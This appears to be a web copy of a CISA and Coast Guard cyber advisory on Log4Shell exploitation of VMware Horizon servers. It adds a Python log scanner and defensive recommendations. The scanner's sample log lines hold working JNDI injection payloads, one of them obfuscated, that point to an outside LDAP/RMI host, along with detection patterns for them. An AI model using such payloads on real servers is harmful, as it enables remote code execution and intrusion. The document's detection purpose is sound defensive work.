Vmware horizon hackers are under exploit

Note: this advisory uses the MITRE ATT&CK for Enterprise framework, version 11.

Update July 18, 2022: This Cybersecurity Advisory (CSA) has been updated with the additional Malware Analysis Report MAR-10382580-2, which provides additional indicators of compromise (IOCs). See the list below to download copies of the IOCs:

  • MAR-10382580-2 STIX

Download the PDF version of this report: Technical Details.

This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims’ networks.

CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report MAR-10382580-1, and MAR-10382254-1. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.


The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds. Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
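As an added detection example that is not part of the advisory, the following Python scans web-server request logs for the Log4j JNDI lookup string that CVE-2021-44228 exploitation relies on, resolving nested lookups first so that obfuscated variants are not missed; the log lines and addresses are constructed for this example.

```python
import re

# Constructed web-server request log lines (client IP ... user-agent); not from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 - - [15/Dec/2021:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [15/Dec/2021:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:rmi://203.0.113.10/b}"
10.0.0.7 - - [15/Dec/2021:10:02:00 +0000] "GET /portal/?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68.0"
"""

# Nested lookups that resolve to a single character, e.g. ${lower:J}, ${upper:j}, ${::-j}, ${env:NOPE:-j}.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{[^{}]*:-([^{}])\}", re.IGNORECASE)
# The JNDI lookup itself, capturing the URI scheme (ldap, rmi, dns, ...) for reporting.
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+):", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse single-character nested lookups to their literal until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: (m.group(1) or m.group(2)).lower(), text)
    return text


def scan_log(log_text: str):
    """Return (line_no, source_ip, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, line.split()[0], m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, ip, scheme in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} sent a JNDI lookup using {scheme}")
```

A hit is a reason to start the threat hunt the advisory recommends, not proof of compromise on its own: correlate the source and timestamp with outbound connections and the IOCs in the referenced MARs.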

  • Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized zone (DMZ), ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.
  • If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
  • Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions.